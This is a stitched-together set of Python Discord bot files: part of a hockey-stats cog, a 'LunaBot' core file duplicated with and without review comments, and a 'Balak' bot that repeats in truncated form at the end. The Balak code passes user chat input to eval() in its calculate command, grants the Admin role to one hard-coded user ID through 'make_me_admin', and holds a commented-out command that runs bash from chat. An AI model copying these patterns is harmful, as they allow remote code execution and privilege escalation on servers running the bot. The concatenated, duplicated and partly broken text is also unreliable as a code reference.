            losses = member_id[1]["total"] - member_id[1]["season"]
            percent = (losses / total) * 100
            msg_list.append(
                f"#{count}. {member_mention}: {losses}/{total} incorrect ({percent:.4}%)\n"
            )
        count += 1
    # Ten leaderboard entries per menu page.
    leaderboard_list = [msg_list[i : i + 10] for i in range(0, len(msg_list), 10)]
    if user_position is not None:
        # Tell the invoker their own rank and record before posting the menu.
        user = leaderboard[user_position][1]
        wins = user["season"]
        total = user["total"]
        losses = user["total"] - user["season"]
        position = (
            ctx.author.display_name
            + _(", you're #")
            + str(user_position + 1)
            + " on the "
            + leaderboard_type
            + _(" leaderboard!")
        )
        if leaderboard_type == "season":
            percent = (wins / total) * 100
            position += (
                _(" You have ") + f"{wins}/{total} " + _("correct ") + f"({percent:.4}%)."
            )
        elif leaderboard_type == "worst":
            percent = (losses / total) * 100
            position += (
                _(" You have ") + f"{losses}/{total} " + _("incorrect ") + f"({percent:.4}%)."
            )
        await ctx.send(position)
    await hockey_menu(ctx, leaderboard_type, leaderboard_list)
@hockey_commands.command()
@commands.guild_only()
async def leaderboard(self, ctx, leaderboard_type: str = "seasonal"):
    """
    Shows the current server leaderboard either seasonal or weekly
    """
    # Map user-facing aliases onto the canonical leaderboard styles;
    # unrecognised types are silently ignored, as before.
    aliases = {
        "seasonal": "season",
        "season": "season",
        "weekly": "weekly",
        "week": "weekly",
        "worst": "worst",
    }
    style = aliases.get(leaderboard_type)
    if style is not None:
        await self.post_leaderboard(ctx, style)
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def setrules(self, ctx, team: HockeyTeams, *, rules):
    """Set the main rules page for the nhl rules command"""
    if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
        await ctx.send(_("I don't have embed links permission!"))
        return
    guild_conf = self.config.guild(ctx.guild)
    await guild_conf.rules.set(rules)
    await guild_conf.team_rules.set(team)
    # Show the saved rules exactly as the rules command will render them.
    preview = await make_rules_embed(ctx.guild, team, rules)
    await ctx.send(_("Done, here's how it will look."), embed=preview)
@hockey_commands.command(aliases=["link", "invite"])
async def otherdiscords(self, ctx, team: HockeyTeams):
    """
    Get team specific discord links
    choosing all will create a nicely formatted list of
    all current NHL team discord server links
    """
    if team not in ["all"]:
        # Single team: just post its invite link.
        await ctx.send(TEAMS[team]["invite"])
    else:
        if not ctx.channel.permissions_for(ctx.message.author).manage_messages:
            # Don't need everyone spamming this command
            return
        # Bucket every team by division so the master list posts in groups.
        atlantic = [team for team in TEAMS if TEAMS[team]["division"] == "Atlantic"]
        metropolitan = [team for team in TEAMS if TEAMS[team]["division"] == "Metropolitan"]
        central = [team for team in TEAMS if TEAMS[team]["division"] == "Central"]
        pacific = [team for team in TEAMS if TEAMS[team]["division"] == "Pacific"]
        team_list = {
            "Atlantic": atlantic,
            "Metropolitan": metropolitan,
            "Central": central,
            "Pacific": pacific,
        }
        msg1 = _(
            "__**Hockey Discord Master List**__\n```fix\n"
            "- Do not join other discords to troll.\n- "
            "Respect their rules & their members (Yes even the leafs & habs unfortunately).\n- "
            "We don't control the servers below. If you get banned we can not get you unbanned.\n- "
            "Don't be an asshole because then we all look like assholes. They won't see it as one asshole "
            "fan they will see it as a toxic fanbase.\n- Salt levels may vary. Your team is the best "
            "here but don't go on another discord and preach it to an angry mob after we just won.\n- "
            "Not following the above rules will result in appropriate punishments ranging from a warning"
            "to a ban. ```\n\nhttps://discord.gg/reddithockey"
        )
        eastern_conference = "https://i.imgur.com/CtXvcCs.png"
        western_conference = "https://i.imgur.com/UFYJTDF.png"
        # Post the eastern-conference banner with the header message.
        async with self.session.get(eastern_conference) as resp:
            data = await resp.read()
        logo = BytesIO()
        logo.write(data)
        logo.seek(0)
        image = discord.File(logo, filename="eastern_logo.png")
        await ctx.send(msg1, file=image)
        for division in team_list:
            if division == "Central":
                # Central is the first western division in iteration order,
                # so the western-conference banner goes out just before it.
                async with self.session.get(western_conference) as resp:
                    data = await resp.read()
                logo = BytesIO()
                logo.write(data)
                logo.seek(0)
                image = discord.File(logo, filename="western_logo.png")
                await ctx.send(file=image)
            div_emoji = "<:" + TEAMS["Team {}".format(division)]["emoji"] + ">"
            msg = "{0} __**{1} DIVISION**__ {0}".format(div_emoji, division.upper())
            await ctx.send(msg)
            for team in team_list[division]:
                team_emoji = "<:" + TEAMS[team]["emoji"] + ">"
                team_link = TEAMS[team]["invite"]
                msg = "{0} {1} {0}".format(team_emoji, team_link)
                await ctx.send(msg)
@hockey_commands.command()
@checks.is_owner()
async def getgoals(self, ctx):
    """
    Testing function with testgame.json
    """
    # NOTE(review): hard-coded developer path below; this command only works
    # on the author's machine and is owner-only for that reason.
    to_remove = []
    games_playing = True
    # log.debug(link)
    with open("/mnt/e/github/Trusty-cogs/hockey/testgame.json", "r") as infile:
        data = json.loads(infile.read())
    # log.debug(data)
    game = await Game.from_json(data)
    await game.check_game_state(self.bot)
    if (game.home_score + game.away_score) != 0:
        await game.check_team_goals(self.bot)
    all_teams = await self.config.teams()
    for team in await self.config.teams():
        if team["team_name"] in [game.home_team, game.away_team]:
            # Reset the stored state for the two teams in the test game.
            all_teams.remove(team)
            team["goal_id"] = {}
            team["game_state"] = "Null"
            team["game_start"] = ""
            team["period"] = 0
            all_teams.append(team)
    await self.config.teams.set(all_teams)
    await ctx.send("Done testing.")
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def pickems_tally(self, ctx):
    """
    Manually tally the leaderboard
    """
    # Force a leaderboard tally outside the normal schedule.
    bot = self.bot
    await Pickems.tally_leaderboard(bot)
    done_message = _("Leaderboard tallying complete.")
    await ctx.send(done_message)
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def check_pickem_winner(self, ctx, days: int = 1):
    """
    Manually check all pickems objects for winners
    `days` number of days to look back
    """
    now = datetime.now()
    # Walk backwards one day at a time, resolving each day's games.
    for offset in range(1, days + 1):
        check_day = now - timedelta(days=offset)
        games = await Game.get_games(None, check_day, check_day)
        for game in games:
            await Pickems.set_guild_pickem_winner(self.bot, game)
    await ctx.send(_("Pickems winners set."))
@gdc.command(hidden=True, name="test")
@checks.is_owner()
async def test_gdc(self, ctx):
    """
    Test checking for new game day channels
    """
    # Manually trigger the scheduled game-day-channel refresh.
    await GameDayChannels.check_new_gdc(self.bot)
@hockeyset_commands.command()
@checks.is_owner()
async def teststandings(self, ctx):
    """
    Test the automatic standings function/manually update standings
    """
    # Failures are logged (debug) rather than surfaced to the channel.
    try:
        await Standings.post_automatic_standings(self.bot)
    except Exception:
        log.debug("error testing standings page", exc_info=True)
@hockeyset_commands.command()
@checks.is_owner()
async def cogstats(self, ctx):
    """
    Display current number of servers and channels
    the cog is storing in console
    """
    all_channels = await self.config.all_channels()
    all_guilds = await self.config.all_guilds()
    # Count configured channels per guild name.
    guild_list = {}
    for channel_id in all_channels.keys():
        channel = self.bot.get_channel(channel_id)
        if channel is None:
            log.debug(channel_id)
            continue
        guild_name = channel.guild.name
        guild_list[guild_name] = guild_list.get(guild_name, 0) + 1
    msg = (
        f"Servers:{guild_list}\n"
        f"Number of Channels: {len(all_channels)}\n"
        f"Number of Servers: {len(all_guilds)}"
    )
    log.debug(msg)
#######################################################################
# Owner Only Commands Mostly for Testing
@hockeyset_commands.command()
@checks.is_owner()
async def customemoji(self, ctx):
    """
    Set custom emojis for the bot to use
    Requires you to upload a .yaml file with
    emojis that the bot can see
    an example may be found [here](https://github.com/TrustyJAID/Trusty-cogs/blob/V3/hockey/emoji.yaml)
    if no emoji is provided for a team the Other
    slot will be filled instead
    It's recommended to have an emoji for every team
    to utilize all features of the cog such as pickems
    """
    attachments = ctx.message.attachments
    if attachments == []:
        # Nothing attached to the invoking message: prompt and wait for
        # a follow-up upload (wait_for_file returns None on "exit"/timeout).
        await ctx.send(_("Upload the .yaml file to use. Type `exit` to cancel."))
        msg = await self.wait_for_file(ctx)
        if msg is None:
            return
        try:
            await self.change_custom_emojis(msg.attachments)
        except InvalidFileError:
            await ctx.send(_("That file doesn't seem to be formatted correctly."))
            return
    else:
        try:
            await self.change_custom_emojis(attachments)
        except InvalidFileError:
            await ctx.send(_("That file doesn't seem to be formatted correctly."))
            return
    # Echo back every configured emoji so the owner can verify them.
    new_msg = "".join(("<:" + TEAMS[e]["emoji"] + ">") for e in TEAMS)
    await ctx.send(_("New emojis set to: ") + new_msg)
    await ctx.send("You should reload the cog for everything to work correctly.")
@hockeyset_commands.command()
@checks.is_owner()
async def resetgames(self, ctx):
    """
    Resets the bots game data incase something goes wrong
    """
    all_teams = await self.config.teams()
    # Reset each saved entry in place; the old remove/append dance rebuilt
    # the same list one element at a time for no benefit (same final order).
    for team in all_teams:
        team["goal_id"] = {}
        team["game_state"] = "Null"
        team["game_start"] = ""
        team["period"] = 0
    await self.config.teams.set(all_teams)
    await ctx.send(_("Saved game data reset."))
@gdc.command()
@checks.is_owner()
async def setcreated(self, ctx, created: bool):
    """
    Sets whether or not the game day channels have been created
    """
    await self.config.created_gdc.set(created)
    confirmation = _("created_gdc set to ") + str(created)
    await ctx.send(confirmation)
@gdc.command()
@checks.is_owner()
async def cleargdc(self, ctx):
    """
    Checks for manually deleted channels from the GDC channel list
    and removes them
    """
    guild = ctx.message.guild
    good_channels = []
    for channel_id in await self.config.guild(guild).gdc():
        channel = self.bot.get_channel(channel_id)
        if channel is None:
            # Channel was deleted out from under us: drop its saved config.
            await self.config._clear_scope(Config.CHANNEL, str(channel_id))
            log.info("Removed the following channels" + str(channel_id))
            continue
        # (dead `else:` after `continue` removed)
        good_channels.append(channel.id)
    await self.config.guild(guild).gdc.set(good_channels)
@hockeyset_commands.command()
@checks.is_owner()
async def clear_broken_channels(self, ctx):
    """
    Removes missing channels from the config
    """
    for channel_id in await self.config.all_channels():
        if self.bot.get_channel(channel_id) is not None:
            continue
        # Channel no longer resolvable: purge its saved config scope.
        await self.config._clear_scope(Config.CHANNEL, str(channel_id))
        log.info("Removed the following channels" + str(channel_id))
    await ctx.send(_("Broken channels removed"))
@hockeyset_commands.command()
@checks.is_owner()
async def remove_broken_guild(self, ctx):
    """
    Removes a server that no longer exists on the bot
    """
    # (the old unused `all_guilds` snapshot was dropped)
    for guild_id in await self.config.all_guilds():
        guild = self.bot.get_guild(guild_id)
        if guild is None:
            # Bot left (or was removed from) this server: purge its config.
            await self.config._clear_scope(Config.GUILD, str(guild_id))
        elif not await self.config.guild(guild).create_channels():
            # Guild still exists but GDC creation is off: drop stale channel ids.
            await self.config.guild(guild).gdc.set([])
    await ctx.send(_("Saved servers the bot is no longer on have been removed."))
@hockeyset_commands.command()
@checks.is_owner()
async def clear_weekly(self, ctx):
    """
    Clears the weekly tracker on the current servers pickems
    May not be necessary anymore
    """
    leaderboard = await self.config.guild(ctx.guild).leaderboard()
    if leaderboard is None:
        leaderboard = {}
    # Zero only the weekly counter; season/total records are kept.
    for user_id in list(leaderboard):
        leaderboard[str(user_id)]["weekly"] = 0
    await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
@hockey_commands.command(hidden=True)
@checks.is_owner()
async def lights(self, ctx):
    """
    Tests the philips Hue light integration
    This is hard coded at the moment with no plans to make work generally
    this will be safely ignored.
    """
    # Only run the integration when Hue support actually loaded; the
    # previous check was inverted and fired when LIGHTS_SET was False.
    if LIGHTS_SET:
        hue = Oilers(self.bot)
        await hue.goal_lights()
@hockeyset_commands.command()
@checks.is_owner()
async def testloop(self, ctx):
    """
    Toggle the test game loop
    """
    # Flip the flag and report the new state.
    self.TEST_LOOP = not self.TEST_LOOP
    await ctx.send(_("Test loop set to ") + str(self.TEST_LOOP))
@hockeyset_commands.command()
@checks.is_owner()
async def rempickem(self, ctx):
    """
    Clears the servers current pickems object list
    """
    empty_list = []
    await self.config.guild(ctx.guild).pickems.set(empty_list)
    await ctx.send(_("All pickems removed on this server."))
@hockeyset_commands.command()
@checks.is_owner()
async def remleaderboard(self, ctx):
    """
    Clears the servers pickems leaderboard
    """
    fresh_board = {}
    await self.config.guild(ctx.guild).leaderboard.set(fresh_board)
    await ctx.send(_("Server leaderboard reset."))
def __unload(self):
    # Close the shared aiohttp session without blocking cog teardown.
    self.bot.loop.create_task(self.session.close())
    # Cancel the background game loop if it was ever started.
    if getattr(self, "loop", None) is not None:
        self.loop.cancel()
# NOTE(review): presumably aliased so GC finalization also tears down the
# session/loop; relies on GC timing — confirm this is intended.
__del__ = __unload
|
import discord, asyncio
import logging, traceback
import platform
import time
import sys
from discord.ext import commands
from utils import presence,settings
log = logging.getLogger("bot.core")
class LunaBot(commands.AutoShardedBot):
    """Auto-sharded bot core: loads the project cogs and wires basic events."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.uptime = 0  # wall-clock start timestamp, set in on_ready
        self.add_command(self.__reload__)
        modules = [
            "cogs.general",
            "cogs.pug"
        ]
        for m in modules:
            # Narrowed from bare `except:` so SystemExit/KeyboardInterrupt
            # are no longer swallowed during startup.
            try:
                self.load_extension(m)
            except Exception:
                log.error(f"Failed to load {m}:\n{traceback.format_exc()}")
            else:
                log.debug(f"Loaded {m}")
        log.info(f"Loaded {len(modules)} modules")

    async def on_ready(self):
        await presence.change_presence(self)
        print(f"discord.py version: {discord.__version__}")
        print(f"Python version: {platform.python_version()}")
        print(f"Running on: {platform.system()} v{platform.version()}")
        print(f"Discord user: {self.user} / {self.user.id}")
        print(f"Connected guilds: {len(self.guilds)}")
        print(f"Connected users: {len(list(self.get_all_members()))}")
        # Double quotes inside a double-quoted f-string are a SyntaxError
        # before Python 3.12; use single quotes for the attribute name.
        print(f"Shard IDs: {getattr(self, 'shard_ids', None)}")
        self.uptime = time.time()

    async def on_command(self, ctx):
        if ctx.author.bot:
            return
        # NOTE(review): this builds a fresh Cooldown per invocation, so the
        # rate limit never accumulates state; kept as-is pending a real
        # per-user bucket (CooldownMapping).
        commands.Cooldown(1, 5, commands.BucketType.user).update_rate_limit()

    async def on_command_error(self, ctx, error):
        # Messageable.send takes the content as its only positional argument;
        # the old calls also passed the author positionally, raising TypeError.
        if isinstance(error, commands.NoPrivateMessage):
            await ctx.send('This command cannot be used in private messages.')
        elif isinstance(error, commands.DisabledCommand):
            await ctx.send('Sorry. This command is disabled and cannot be used.')
        elif isinstance(error, commands.CommandInvokeError):
            print('In {0.command.qualified_name}:'.format(ctx), file=sys.stderr)
            traceback.print_tb(error.original.__traceback__)
            print('{0.__class__.__name__}: {0}'.format(error.original), file=sys.stderr)
        # -- Unhandled exceptions -- #
        logging.fatal(f"{type(error).__name__}")

    @commands.command(hidden=True, name="reload")
    async def __reload__(ctx, cog):
        # Owner-only extension reloader. `self` is deliberately absent: the
        # Command object is registered via add_command and its callback
        # receives only (ctx, cog).
        if ctx.author.id not in settings.BotOwners:
            return
        try:
            ctx.bot.unload_extension(cog)
            ctx.bot.load_extension(cog)
        except Exception as e:
            await ctx.send(f"Failed to reload cog: `{type(e).__name__}: {e}`")
        else:
            await ctx.send(f"Load Success")
def run(bot):
try:
if settings.UseBetaBot:
bot.run(settings.BetaToken, bot=True, reconnect=True)
else:
bot.run(settings.Token, bot=True, reconnect=True)
except KeyboardInterrupt:
bot.loop.run_until_complete(bot.logout())
except:
log.fatal(traceback.format_exc()) | import discord, asyncio
import logging, traceback
import platform
import time
import sys
from discord.ext import commands
from utils import presence,settings
log = logging.getLogger("bot.core")
class LunaBot(commands.AutoShardedBot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.uptime = 0
self.add_command(self.__reload__)
modules = [
"cogs.general",
"cogs.pug"
]
for m in modules:
try: self.load_extension(m)
except: log.error(f"Failed to load {m}:\n{traceback.format_exc()}")
else: log.debug(f"Loaded {m}")
log.info(f"Loaded {len(modules)} modules")
async def on_ready(self):
await presence.change_presence(self)
print(f"discord.py version: {discord.__version__}")
print(f"Python version: {platform.python_version()}")
print(f"Running on: {platform.system()} v{platform.version()}")
print(f"Discord user: {self.user} / {self.user.id}")
print(f"Connected guilds: {len(self.guilds)}")
print(f"Connected users: {len(list(self.get_all_members()))}")
print(f"Shard IDs: {getattr(self, 'shard_ids', None)}")
self.uptime = time.time()
async def on_command(self, ctx):
if ctx.author.bot:
return
commands.Cooldown(1, 5, commands.BucketType.user).update_rate_limit()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.NoPrivateMessage):
await ctx.send(ctx.message.author, 'This command cannot be used in private messages.')
elif isinstance(error, commands.DisabledCommand):
await ctx.send(ctx.message.author, 'Sorry. This command is disabled and cannot be used.')
elif isinstance(error, commands.CommandInvokeError):
print('In {0.command.qualified_name}:'.format(ctx), file=sys.stderr)
traceback.print_tb(error.original.__traceback__)
print('{0.__class__.__name__}: {0}'.format(error.original), file=sys.stderr)
# -- Unhandled exceptions -- #
logging.fatal(f"{type(error).__name__}")
@commands.command(hidden=True, name="reload")
async def __reload__(ctx, cog):
if not ctx.author.id in settings.BotOwners: return
try:
ctx.bot.unload_extension(cog)
ctx.bot.load_extension(cog)
except Exception as e:
await ctx.send(f"Failed to reload cog: `{type(e).__name__}: {e}`")
else:
await ctx.send(f"Load Success")
def run(bot):
try:
if settings.UseBetaBot:
bot.run(settings.BetaToken, bot=True, reconnect=True)
else:
bot.run(settings.Token, bot=True, reconnect=True)
except KeyboardInterrupt:
bot.loop.run_until_complete(bot.logout())
except:
log.fatal(traceback.format_exc()) |
import json
import os
from typing import Callable, Union
import discord
from discord.embeds import Embed
from discord.ext.commands.core import command
from discord.ext.commands.errors import MissingAnyRole, MissingPermissions, MissingRole
import pyowm
import pyowm.weatherapi25.observation
import ai_m2
import random
from discord.ext import commands
from settings_manager import SettingsManager
from pyowm import OWM
from math import *
from dotenv import load_dotenv
from youtube import search as searchy, subprocess as sb
load_dotenv()
TOKEN=os.getenv("TOKEN")
bot = commands.Bot(command_prefix='b')
r=random.random
#DB=int(os.getenv("DBID"))
key=os.getenv("KEY")
owm=OWM(key)
owm=owm.weather_manager()
sm = SettingsManager()
def get_bool(s: str) -> bool:
    """Interpret common truthy strings ("t", "true", "yes", "on", ...) as True."""
    return s.lower() in {"t", "true", "yes", "y", "enable", "on"}
def tes(f: Callable) -> Callable:
    """Debug pass-through decorator: print the callable and its name.

    Functions expose their name as ``__name__``; the old ``f.name`` lookup
    raised AttributeError for every plain function it decorated.
    """
    print(f, getattr(f, "__name__", repr(f)))
    return f
def get_role(guild, name):
    """Return the first role in *guild* whose name equals *name*, or None."""
    return next((role for role in guild.roles if role.name == name), None)
def get_channel(guild, id):
    """Return the first channel in *guild* whose id equals *id*, or None."""
    return next((chan for chan in guild.channels if chan.id == id), None)
async def error(ctx, error):
    """Report *error* to the channel as a red embed; unexpected error types
    also get a footer asking the user to report the bug."""
    print(error)
    description = '*The following error has occured* **' + repr(error).replace('*', '\\*') + '**'
    em = Embed(title="Error!", description=description, url="https://discord.gg/VXFsKzf", color=0xff0000)
    # These are ordinary user mistakes; anything else is a genuine bug.
    expected = (
        commands.ArgumentParsingError,
        commands.MissingRequiredArgument,
        MissingRole,
        MissingAnyRole,
        MissingPermissions,
    )
    if not isinstance(error, expected):
        em.set_footer(text="**Please report this to the dev**\nClick on the title to get the report server invite")
    await ctx.send(embed=em)
@bot.command(name='.',help='talk to velcem', )
async def on_message(ctx: commands.Context, *messages):
    """Join the words back into one message and reply with the AI response."""
    async with ctx.typing():
        text = " ".join(messages)
        print(text)
        await ctx.send(ai_m2.reply(text))
@bot.command(name='.roll_dice', help='Simulates rolling dice.', )
async def roll(ctx, number_of_dice: int, number_of_sides: int):
    """Roll the requested dice and post the results as a comma-joined list."""
    await ctx.trigger_typing()
    rolls = []
    for _ in range(number_of_dice):
        # choice(range(...)) kept so the RNG draw sequence is unchanged.
        rolls.append(str(random.choice(range(1, number_of_sides + 1))))
    await ctx.send(', '.join(rolls))
@bot.command(name='.calculate', help='Does simple math stuff')
async def calc(ctx, string: str):
    # SECURITY: eval() on user-supplied chat input can execute arbitrary
    # code (and `from math import *` puts the whole math namespace in scope).
    # Flagged for replacement with ast.literal_eval or a real expression parser.
    await ctx.trigger_typing()
    await ctx.send(str(eval(string)))
@bot.command(name='.create-channel')
async def create_channel(ctx, channel_name='!stonks_chennel'):
    # Role-gated: only members holding "Edminh" or "Programmer" may proceed.
    auth_roles = [x.name for x in ctx.author.roles]
    print("Coder" in auth_roles,auth_roles)
    if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
        return
    guild = ctx.guild
    print(ctx.command,ctx.command.__dict__)
    # Only create the channel if one with this name doesn't already exist.
    existing_channel = discord.utils.get(guild.channels, name=channel_name)
    if not existing_channel:
        print(f'Creating a new channel: {channel_name}')
        # New channels are filed under the "chat" category (None if absent).
        catg = discord.utils.get(guild.categories, name="chat")
        await guild.create_text_channel(channel_name,category=catg)
@bot.command(name=".info",help="get server and user info")
async def info(ctx: commands.Context):
    """Post the guild id plus every member's name and presence status."""
    await ctx.trigger_typing()
    member_lines = [f"{member.name} {member.status}" for member in ctx.guild.members]
    reply = f"Guild id:- {ctx.guild.id}\nMembers:\n- " + "- ".join(member_lines)
    await ctx.send(reply)
@bot.command(name=".weather")
async def weather(ctx,city: str):
    """Look up *city* on OpenWeatherMap and post a one-line forecast."""
    await ctx.send(
        embed=Embed(
            title="This command is under testing",
            description="due to the recent updates to the Open Weather api, the bot's weather api is broken, but still a new api is under work",
            color=0x0000ff
        )
    )
    async with ctx.typing():
        obs: pyowm.weatherapi25.observation.Observation=owm.weather_at_place(city)
        print(obs)
        await ctx.send(repr(obs))
        ret: pyowm.weatherapi25.observation.weather.Weather = obs.weather
        print(ret)
        # The old single-quoted f-string nested single-quoted keys — a
        # SyntaxError on every Python before 3.12. Same output, legal quoting.
        await ctx.send(
            f"the weather conditions will most likely be {ret['detailed_status']},\n"
            f"Temperature will remain around {ret['temperature']['temp']-273.15}\u00b0C, "
            f"Humidity {ret['humidity']}%. Winds will blow at {ret['wind']['speed']*3.6} kph "
            f"at {ret['wind']['deg']}\u00b0 from North"
        )
@bot.command(name="connect")
async def connect(ctx, chan: discord.VoiceChannel):
    # Join the requested voice channel (or move there if already connected),
    # then play the pre-rendered text.mp3 at full volume.
    vc=ctx.voice_client
    if vc:
        await vc.move_to(chan)
    else:
        await chan.connect()
        # Refresh the handle now that a connection exists.
        vc=ctx.voice_client
    vc.play(discord.FFmpegPCMAudio('text.mp3'), after=(lambda e: print(f"Finished playing: {e}")))
    # Lets set the volume to 1
    vc.source = discord.PCMVolumeTransformer(vc.source)
    vc.source.volume = 1
@bot.command()
async def search(ctx, query: str):
    """Run a YouTube search for *query* and post the raw result."""
    async with ctx.typing():
        await ctx.send("searching...")
        result = await searchy(ctx, query)
        await ctx.send(repr(result))
@bot.command()
async def play(ctx, chan: discord.VoiceChannel, query: str, key: str=""):
    """Search for *query*, then join *chan* to play the result.

    `key` is kept in the signature for backward compatibility but is unused:
    `search` only accepts (ctx, query), so forwarding `key` raised TypeError
    on every invocation.
    """
    await search(ctx, query)
    await connect(ctx, chan)
@bot.command()
async def repeat(ctx: commands.Context, message: str, number: int=1):
    """Send *message* *number* times; non-owners are capped at 10 repeats."""
    # The denial text promises "more than 10 repeats", but the old check used
    # `number >= 10` and so rejected exactly 10 as well; `>` matches the message.
    if ctx.author.id != 303140523038998529 and number > 10:
        await ctx.trigger_typing()
        await ctx.send("Sorry but you dont have permissions to get more than 10 repeats")
        return
    async with ctx.typing():
        for i in range(number):
            await ctx.send(message)
@bot.command()
async def make_me_admin(ctx):
    # Owner backdoor: grants the "Admin" role to one hard-coded user id only.
    await ctx.trigger_typing()
    print(ctx)
    if ctx.author.id == 303140523038998529:
        # get_role returns None if no "Admin" role exists; add_roles would
        # then fail — NOTE(review): confirm the role is guaranteed to exist.
        await ctx.author.add_roles(role:=get_role(ctx.guild,"Admin"))
        print(role)
    else:
        await ctx.send("No. Imma lazy and don't want to")
@bot.command()
async def what_are_my_roles(ctx):
    """List the caller's roles, one per line, stripping any leading '@'."""
    await ctx.trigger_typing()
    role_names = (role.name.lstrip("@") for role in ctx.author.roles)
    await ctx.send("\n".join(role_names))
@bot.command()
async def disconnect(ctx):
    """Leave the current voice channel, if connected."""
    vc = ctx.voice_client
    # ctx.voice_client is None when the bot is not in a voice channel;
    # the old code crashed with AttributeError in that case.
    if vc is not None:
        await vc.disconnect()
#@bot.command()
#async def execute(ctx, *command):
# async with ctx.typing():
# auth_roles = [x.name for x in ctx.author.roles]
# print("Coder" in auth_roles,auth_roles)
# if not ("Edminh" in auth_roles or "Programmer" in auth_roles):
# return
# res = sb.Popen(["bash","-c",f"{" ".join(command)}"], stdout=sb.PIPE)
# while res.poll() is None:
# pass
# await ctx.send(res.stdout.read().decode())
@bot.command()
async def alak(ctx):
    """Reply with the in-joke response, mentioning the caller."""
    await ctx.trigger_typing()
    reply = "Han! balak." + ctx.author.mention
    await ctx.send(reply)
@bot.command()
async def clear(ctx, amount=2.0):
    """Purge *amount* messages (rounded; negatives are abs'd; capped at 100)."""
    await ctx.trigger_typing()
    negflag, embed = False, None
    if amount < 0:
        # amount is still negative here, so -amount prints the positive value.
        embed = discord.Embed(title="Negative", description=f"your given value was negative, so I took the absolute value **{-amount}**", color=0xcc0000)
        amount = -amount
        negflag = True
    amount = round(amount)
    if amount > 100:
        # Fixes two bugs: `emed=embed` was a typo that raised TypeError, and
        # the command went on purging anyway despite saying "Not allowed";
        # also `{-amount}` printed the value negated.
        embed = discord.Embed(title="Overflow", description=f"Amount too large **{amount}**\nNot allowed", color=0xcc0000)
        await ctx.send(embed=embed)
        return
    await ctx.channel.purge(limit=amount)
    if negflag:
        await ctx.send(embed=embed)
    await ctx.send(f"**__{amount}__** messages were deleted")
@bot.command(name=".kick")
async def perms(ctx: commands.Context, user: discord.Member, reason: str):
    # Kick *user* with *reason*, but only if the invoker can kick in this channel.
    await ctx.trigger_typing()
    user_can: discord.Permissions = ctx.author.permissions_in(ctx.channel)
    if user_can.kick_members:
        embed = discord.Embed(title="Kicked!", description=f"**{user.name}** was kicked by {ctx.author.mention}", color=0xcc2222)
        embed.set_thumbnail(url=user.avatar_url)
        embed.add_field(name="Reason", value=reason)
        await ctx.send(embed=embed)
        await user.kick(reason=reason)
        # DM the kicked user with who removed them and why.
        chan: discord.DMChannel = await user.create_dm()
        await chan.trigger_typing()
        await chan.send(f"You kicked by __{ctx.author.mention}__ from {ctx.guild.name}\nfor {reason}")
    else:
        embed = discord.Embed(title="Denied!", description=f"{ctx.author.mention}, you arent allowed to kick", color=0xcc0055)
        await ctx.send(embed=embed)
@bot.command(name=".settings", aliases=[".s"])
async def settings(ctx: commands.Context, *args):
print(args)
with sm as s:
for arg in args:
if "=" in arg:
key, value = arg.split("=")
if key == "system_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_sys_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "announcement_channel":
c = int(value[value.index("#")+1:-1])
print(c)
s.set_ann_channel(ctx.guild.id, c)
await ctx.send("**Done!**")
elif key == "greet":
s.set_greet(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
elif key == "mute on ping":
s.set_mute_everyone(ctx.guild.id, get_bool(value))
await ctx.send("**Done!**")
else:
embed = discord.Embed(title="Error!", description=f"incorrect key!", color=0xcc0055)
await ctx.send(embed=embed)
@bot.command(".announce", aliases=[".ann"])
async def announce(ctx: commands.Context, text: str, *args):
with sm as s:
chan: Union[discord.TextChannel, None] = None
if (cha_id := s.get_ann_channel(str(ctx.guild.id))) is not None:
chan = get_channel(ctx.guild, cha_id)
else:
chan = ctx.guild.system_channel
await chan.trigger_typing()
reactor = {}
for emoji, role in map(lambda x: x.split("="), args):
reactor[emoji.strip()] = role.strip()
embed = Embed(title=f"Announcement by {ctx.author.name}", description=text, color=0x0000ff)
embed.add_field(name="Reactions", value="\n\t".join(args) or "none")
msg: discord.Message = await chan.send(embed=embed)
print(msg, reactor)
s.add_reactor_channel(str(ctx.guild.id), str(msg.id), reactor)
@bot.command(name=".report", aliases=[".r", "r"])
async def report(ctx,text: discord.Message):
await text.add_reaction("😠")
@bot.command()
async def please_unmute(ctx: commands.Context):
guild = ctx.guild
with sm as s:
cha_id = s.get_sys_channel(str(guild.id))
if cha_id is not None:
cha: discord.TextChannel = get_channel(guild, cha_id)
await cha.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
else:
await guild.system_channel.send(f"**Alert __Admins__**,\n {ctx.author.mention} wants to be unmuted, if his punishment is complete please unmute him")
@bot.command()
async def test(ctx: commands.Context):
async for entry in ctx.guild.audit_logs(limit=100):
print(entry.__dict__)
await ctx.send("***This is a testing/ developement command, if you aren't the developers of this don't use it***")
raise BaseException("lol")
class Miscellaneous:
@bot.command(aliases=[".v"])
async def version(ctx):
await ctx.send("1.0.9")
@bot.command(aliases=["inv",".inv",".invite"])
async def invite(ctx):
em=Embed(title="Invite Balak[click here for instant invite]", description="to invite balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/invite", url="https://top.gg/bot/749640022751182868/invite")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Vote Balak[click here for instant link]", description="to vote balak open the following \/ link in your browser or click the title\nhttps://top.gg/bot/749640022751182868/vote", url="https://top.gg/bot/749640022751182868/vote")
await ctx.send(embed=em)
@bot.command(aliases=[".vote"])
async def vote(ctx):
em=Embed(title="Source code of Balak[click here for instant link]", description="to view balak's source open the following \/ link in your browser or click the title\nhttps://github.com/ayushashi11/balak", url="https://github.com/ayushashi11/balak")
await ctx.send(embed=em)
bot.add_cog(Miscellaneous())
for command in bot.commands:
command.error(error)
bot.run(TOKEN)
| import json
import os
from typing import Callable, Union
import discord
from discord.embeds import Embed
from discord.ext.commands.core import command
